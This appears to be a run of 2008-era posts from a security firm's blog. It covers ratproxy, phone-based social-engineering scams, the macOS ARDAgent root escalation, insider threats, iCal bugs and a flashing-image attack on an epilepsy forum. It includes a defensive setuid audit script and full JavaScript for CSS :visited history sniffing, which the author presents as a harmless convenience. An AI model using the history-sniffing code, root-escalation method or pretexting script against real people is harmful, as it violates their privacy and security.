Google announced that it has released ratproxy, its passive web analysis tool. It “rides along with you” as you browse and flags areas that may be an issue. Since it rides along, it can also inspect restricted areas that require authentication. It’s not a replacement for the more active scanners and proxies (WebScarab, Paros), but it could certainly help the more casual user find potential issues. It doesn’t, however, let you fiddle with HTTP requests and responses as those proxies do. Play with it and see how you like it before adding it to your arsenal; I think it will be a great addition.
Telephones are unsecured, direct-access conduits to your users and can bypass passwords, encryption, and any other fancy technical protections.
Many people are confident they won’t fall for the “you’ve just won a million dollars, give me your bank account information so we can transfer the money!!” type of scheme. If it’s too good to be true (as they say) it usually is.
Put people on the defensive and these tricks work a little better.
The phone rings, you pick it up, and the caller identifies himself as an officer of the court. He says you failed to report for jury duty and that a warrant is out for your arrest. You say you never received a notice. To clear it up, the caller says he’ll need some information for “verification purposes”: your birth date, social security number, maybe even a credit card number.
Social engineering works because people are the weakest link in security. Training to protect against these attacks in a work environment is difficult, especially for positions that handle many phone calls. Employees caught off guard, stressed, or disgruntled are particularly vulnerable.
More technical details can be found at this excellent piece at Matasano Chargen.
Tiger and Leopard ship with the Apple Remote Desktop agent (ARDAgent) installed setuid root. To make it worse, it accepts AppleScript, and one of the commands it supports is “do shell script”. You can see where this is leading: a local user can run commands as root. This type of vulnerability (root access through a careless setuid-root program) is one that I would classify as ancient. Most setuid-root programs are audited specifically to make sure they never hand control to user-supplied input like this.
The solution is easy: if you’re not using Apple Remote Desktop, remove the agent, or chmod u-s the binary (which removes the setuid bit).
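As an added example (not code from the original post), here are POSIX shell helpers that do the audit behind that advice: list every setuid file under a tree so setuid-root entries stand out, and strip the bit from a binary you don’t need. The post does not give ARDAgent’s path inside its .app bundle, so the path is left as an argument rather than hard-coded.

```shell
#!/bin/sh
# Added example, not from the original post: audit a directory tree for
# setuid files and strip the bit from a named binary. Paths are arguments,
# so the same functions work on /System, /usr/bin, or a scratch directory.

# Print "ls -l" for every regular file under $1 with the setuid bit set.
# The owner column tells you which entries are setuid *root*.
list_setuid() {
    find "$1" -xdev -type f -perm -4000 -exec ls -l {} \; 2>/dev/null
}

# Same search, paths only, for use in scripts.
list_setuid_paths() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Exit 0 if $1 currently has the setuid bit set ([ -u ] is the POSIX test).
is_setuid() {
    [ -u "$1" ]
}

# Strip the setuid bit from $1 and confirm it is gone: the fix the post
# recommends for ARDAgent when Apple Remote Desktop is not in use.
strip_setuid() {
    chmod u-s "$1" && ! is_setuid "$1"
}

# Usage: ./setuid-audit.sh /System   (lists setuid files under /System)
if [ "$#" -gt 0 ]; then
    list_setuid "$1"
fi
```

Run the audit before and after stripping a bit, and keep the first listing: anything that reappears as setuid root after a system update deserves a second look.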
However, this vulnerability does require local access, so it’s somewhat difficult to exploit unless you regularly leave your Mac logged in at a coffee shop while you use the facilities.
What it does raise is the question of how much Apple is investing in secure development and security. If this (quite old-style) vulnerability got through, what else has? Of course, Apple may not have any security employees old enough to remember these types of vulnerabilities. History, even of old systems and old vulnerabilities, is still useful for teaching students.
At the recent InfoSec conference in London, Secure Computing conducted a survey of IT managers. Their findings are interesting:
Over 80 per cent of respondents said that data leaks by insiders, whether deliberate or accidental, is at the top of their list of security woes.
Only 17 per cent cited external threats posed by cyber-criminals, such as spammers and hackers, as more dangerous.
This shows that insider threats are considered more of an issue than external threats.
IT managers have to worry about all of the threats to their systems and data, and to that end they analyze each threat and assign a risk level to it. Clearly, this group of managers considers internal threats a higher risk than external threats.
Usually when we’re asked to perform penetration testing, we’re asked to perform it as an outside attacker, with no knowledge of or access to internal systems. I have seen a few clients request internal assessments or testing, but it tends to cost more because of the need for consultants/testers to be on-site, increasing travel/lodging costs.
If you don’t hire an external company to help you evaluate your internal systems and controls, please at least do it yourself. Remember, most IT managers consider internal threats more dangerous.
What are you to do if you want readers to promote your content? ... You have to decide which bookmarking site, if any, gets your precious screen real estate. It’s a hard choice. If you choose poorly your reader won’t vote (it isn’t a single click, and out-of-sight means out-of-mind) and your content loses its chance to make it big. You have to choose your horse wisely.
If you could detect which social bookmarking sites your reader uses, on a per-reader basis, you could display only the badges they care about. But you can’t know that because the browser secures the user’s history, right? Wrong.
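As an added example (not the post’s own demo code), this is the CSS :visited history-sniffing trick the post relies on: a hidden link is created for each target URL, a stylesheet gives visited links a distinctive colour, and getComputedStyle() reveals which links the browser painted as visited. The list of bookmarking sites is a constructed sample. One caveat a practitioner should know: browsers fixed this in 2010-2011 (Firefox 4, Chrome and Safari, later IE) by making getComputedStyle() report the unvisited style for :visited links, so in any current browser every URL reads “not visited”; the classification logic is kept separate from the DOM probe so it can still be exercised offline.

```javascript
// Added example, not from the original post: CSS :visited history sniffing.
// Modern browsers deliberately lie to getComputedStyle() about :visited
// styling, so this demonstrates the 2008-era technique, not a working
// attack against a current browser.

const VISITED_COLOR = 'rgb(255, 0, 0)';   // colour the stylesheet gives a:visited
const UNVISITED_COLOR = 'rgb(0, 0, 255)'; // colour it gives a:link

// Constructed sample of bookmarking-site front pages to probe.
const BOOKMARK_SITES = [
  'https://digg.com/',
  'https://del.icio.us/',
  'https://www.reddit.com/',
  'https://www.stumbleupon.com/',
];

// Install a stylesheet that paints probe links differently when visited.
function installProbeStyle(doc) {
  const style = doc.createElement('style');
  style.textContent =
    'a.history-probe:link{color:' + UNVISITED_COLOR + '}' +
    'a.history-probe:visited{color:' + VISITED_COLOR + '}';
  doc.head.appendChild(style);
}

// Build an off-screen link to `url`, read its computed colour, remove it.
function probeColorInDocument(doc, url) {
  const a = doc.createElement('a');
  a.className = 'history-probe';
  a.href = url;
  a.textContent = url;
  a.style.position = 'absolute';
  a.style.left = '-9999px';
  doc.body.appendChild(a);
  const color = doc.defaultView.getComputedStyle(a).color;
  doc.body.removeChild(a);
  return color;
}

// Classify URLs using any colour-probe function. The probe is injected so
// the logic runs (and can be tested) with no DOM at all.
function detectVisited(urls, colorOf) {
  const result = { visited: [], unvisited: [] };
  for (const url of urls) {
    (colorOf(url) === VISITED_COLOR ? result.visited : result.unvisited).push(url);
  }
  return result;
}

// Browser entry point: which bookmarking sites has this reader been to?
function sniffBookmarkSites(doc, sites = BOOKMARK_SITES) {
  installProbeStyle(doc);
  return detectVisited(sites, (url) => probeColorInDocument(doc, url));
}

// In a page you would render badges only for the "visited" list, e.g.
// sniffBookmarkSites(document).visited.forEach(showBadgeFor);
// where showBadgeFor is a hypothetical badge renderer of your own.
```

The same probe works for any URL list, not just bookmarking sites, which is exactly why browsers closed it: a page could test thousands of bank, employer or political URLs in a fraction of a second without the user noticing.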
So, is this a cool capability, or a creepy violation of your privacy? I think it is the former, since the code all runs client-side and can be disabled using a tool such as NoScript, and it benefits the user with a cleaner interface. Provide your comments below!
Core Security released details on three iCal bugs last week. What’s troubling is that Apple hasn’t fixed them yet, despite being notified in January. The bugs are relatively harmless if you have iCal configured correctly, i.e. not to automatically parse invitations from Mail. Unfortunately, that’s not the default on Leopard. I’ve run into the same problem before, and I turned the “feature” off for other reasons.
There’s a bug in the ics parser that could potentially allow remote code execution. Not good.
Any program that automatically opens attachments from your mail reader (Mail, Outlook, Thunderbird, etc.) SHOULD BE RECONFIGURED! The same goes for remote images. Any attachment should be treated as suspect unless you know who it came from, and spam does not qualify as “knowing who it came from”.
This simple reconfiguration can save you a lot of headaches in the long run: besides the known vulnerabilities floating around, you’ve closed off a vector for new ones.
Hackers pulled off an attack that had a physical effect when they found a way to post flashing images on an epilepsy forum. Some users of the site experienced migraines and “near-seizure reactions.”
The attack happened when hackers exploited a security hole in the foundation’s publishing software that allowed them to quickly make numerous posts and overwhelm the site’s support forums.
I remember learning in my computer ethics class about bad programming practices that led to physical injuries and even death. Lax security can have all sorts of effects, and when you see someone intentionally trying to bring physical harm to a group of people, you get an idea of the type of person we’re working against.
Please visit our brand new re-launched website for Gemini Security Solutions. The new site has whitepapers, security tools, and a lot more information about what we can do for you.